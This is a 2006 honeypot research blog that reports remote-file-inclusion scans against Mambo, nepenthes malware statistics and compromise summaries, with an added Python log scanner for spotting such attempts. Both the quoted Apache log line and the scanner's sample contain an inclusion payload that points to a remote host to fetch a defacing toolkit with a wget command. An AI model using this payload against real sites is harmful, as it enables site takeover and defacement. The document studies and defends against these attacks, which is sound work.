Defacing Tool 2.0 by r3v3ng4ns

Thursday, August 31. 2006
Besides the compromises of the high-interaction honeypots, we also see quite a few automated attacks. In particular, I see quite a few scanning attempts for vulnerable web applications - phpMyAdmin and Mambo are clearly dominating. The Mambo attacks look like the following:
[Sun Aug 27 14:58:59 2006] [error] [client 195.86.124.210] File does not exist:
/XXX/htdocs/components, referer: http://XXX.128.12.35/components/com_calendar.php?
absolute_path=http://www.freewebtown.com/england90/tool25.gif?&cmd=wget

This is related to a vulnerability in the Calendar module (com_calendar) of Mambo <= 1.5.7 which allows remote file inclusion, as seen in the request (http://www.freewebtown.com/england90/tool25.gif). tool25.gif itself is a defacing toolkit, the same one previously mentioned by the Philippine Honeynet Project and ISC. The attackers just use a different site to host the toolkit and its configuration file (therules25.gif - http://www.freewebtown.com/england90/therules25.gif).

I uploaded the files at http://honeyblog.org/junkyard/web-based/ in a sanitized form. If you want the complete files, just write me an e-mail (thorsten [dot] holz [at] gmail [dot] com).
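One way to spot such remote-file-inclusion attempts in Apache error logs, as an added example that is not part of the original post: the log lines below are constructed in the shape of the entry quoted above, with placeholder hosts and addresses, and any query parameter whose value is itself a remote URL is reported.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample in the format of the Apache error-log entry quoted above.
# Hosts and addresses are placeholders, not the ones from the original log.
SAMPLE_LOG = """\
[Sun Aug 27 14:58:59 2006] [error] [client 192.0.2.10] File does not exist: /srv/htdocs/components, referer: http://honeypot.example/components/com_calendar.php?absolute_path=http://attacker.invalid/england90/tool25.gif?&cmd=wget
[Sun Aug 27 15:01:12 2006] [error] [client 192.0.2.11] File does not exist: /srv/htdocs/favicon.ico, referer: http://honeypot.example/index.php?option=com_content&id=12
[Sun Aug 27 15:02:40 2006] [error] [client 192.0.2.12] File does not exist: /srv/htdocs/robots.txt
"""

# Apache 1.3/2.0 error-log layout: [timestamp] [level] [client ip] message[, referer: url]
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[error\] \[client (?P<ip>[^\]]+)\] "
    r"(?P<msg>.*?)(?:, referer: (?P<referer>\S+))?$"
)
# A parameter value that is itself a URL is the signature of an RFI attempt.
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_error_line(line):
    """Split one error-log line into ts/ip/msg/referer; None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_findings(referer):
    """Return (param, value) pairs from the referer's query string whose value is a remote URL."""
    query = urlsplit(referer).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE_RE.match(v)]


def scan_log(text):
    """Walk the log and collect one record per line carrying an RFI-style referer."""
    hits = []
    for line in text.splitlines():
        rec = parse_error_line(line)
        if not rec or not rec["referer"]:
            continue
        remote = rfi_findings(rec["referer"])
        if remote:
            hits.append({"ts": rec["ts"], "ip": rec["ip"],
                         "script": urlsplit(rec["referer"]).path, "params": remote})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['script']} <- {hit['params']}")
```

The trailing `?` on the included URL is kept on purpose: it is what the attacker appends so that anything Mambo adds after the path becomes a harmless query string on the attacker's server.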

Nepenthes Statistics

Thursday, August 31. 2006
We still run a rather large nepenthes sensor which monitors a /18 network of continuous IP space. Here are some statistics for this sensor:

General Information
First entry in nepenthes database: 2006-05-15 15:21:49
Total number of hits: 4,761,665
Number of unique IPs: 40,556
Number of unique malware: 4,865


Top 10 Malware
Number  Malware name       Number of hits
1       W32/Parite         940
2       Worm.Padobot.M     739
3       Worm/Doomber.D     631
4       Worm/Korgo.U       509
5       Trojan.Gobot-3     422
6       Worm.Padobot.P     415
7       Worm.Padobot.N     384
8       Trojan.Gobot-4     366
9       Backdoor.Gobot.S   332
10      Worm/Padobot.P     329

Summarized Honeypot Compromises

Wednesday, August 30. 2006
The last blog postings described several honeypot compromises in more detail. In total, there were seven honeypot compromises in the first half of 2006 (diploma thesis of Jan Göbel). The following table summarizes these incidents, together with a brief description of each compromise:

No.  Operating System  Vulnerability used  Actions
1    Red Hat 8.0       weak password       SSH scans
2    Suse 9.1          web application     IRC proxy installation
3    Red Hat 8.0       web application     phishing / scanning
4    Suse 9.1          web application     phishing
5    Red Hat 8.0       weak password       user-space IRC bot
6    Red Hat 8.0       weak password       phishing
7    Suse 9.1          web application     none


The attack vectors used to compromise these honeypots were either weak passwords (SSH brute-force scans) or vulnerable web applications. None of the vulnerabilities present in these rather old Linux distributions themselves were used. In the future, we will examine the threat posed by web applications in more detail, mainly focusing on phpMyAdmin and XMLRPC. So stay tuned for further reports :-)

Honeypot Compromises III

Friday, August 18. 2006
We continue our tour of compromised honeypots at the German Honeynet Project, all of which happened while Jan Göbel was mainly responsible for the honeypots. Back in April 2006, a honeypot running Red Hat 8.0 was compromised due to a weak user password. Presumably you see SSH brute-force attacks against your systems quite frequently. This blog post is about what can happen if one of your users has a weak password...

Introduction:
On 3rd April 2006, our Red Hat 8.0 based Honeypot was compromised due to weak SSH passwords of both a user and the root account. Using the Honeywall logfiles together with the information gathered from the Honeypot itself, we will try to reconstruct the events that led to the takeover, as well as the modifications the intruder made to the system.
The intruder initiated an SSH brute-force attack on the Honeypot shortly after midnight. The attack originated from a university host in Norway (witch.xxx.no). Many different username and password combinations were tried, until the intruder finally managed to log in as the root user. Once the system was compromised, several tools were downloaded from different webservers to facilitate the malicious actions of the attacker. Among these tools were some SSH scanners, an IRC client and a rootkit. The Honeypot was then misused to scan for more weak SSH passwords on other systems. Besides the rootkit (zk.tgz), a backdoor was installed, listening on port 3209. Thus, the attacker was able to return to the Honeypot at any time and unnoticed. Additionally, the intruder tried to download the movie “Get Rich Or Die Tryin (Spanish)”, but failed to do so. At about 17:30:27, it was decided to shut down the Honeypot and start the in-depth investigation.

The complete write-up is available in PDF format.

Honeypot Compromises II

Wednesday, August 16. 2006
There was another compromise of our honeypots in May 2006. This time, the affected honeypot was running Red Hat 8.0 and an older version of phpAdsNew was the infection vector. Several SSH brute-force scanners and other tools were used by the attacker - read the full analysis for a complete timeline.


Motivation:
On May 7th 2006 our Red Hat 8.0 based Honeypot was attacked and successfully compromised by exploiting a vulnerability in an installed web application, named phpAdsNew. The vulnerability allows a remote attacker to execute arbitrary commands with the privileges of the webserver on the victim host. This flaw is due to an unspecified error in the XML-RPC library for PHP. It was first discovered in July 2005 and affects all phpAdsNew versions up to 2.0.5.

The full analysis was written by Jan Göbel during his thesis work.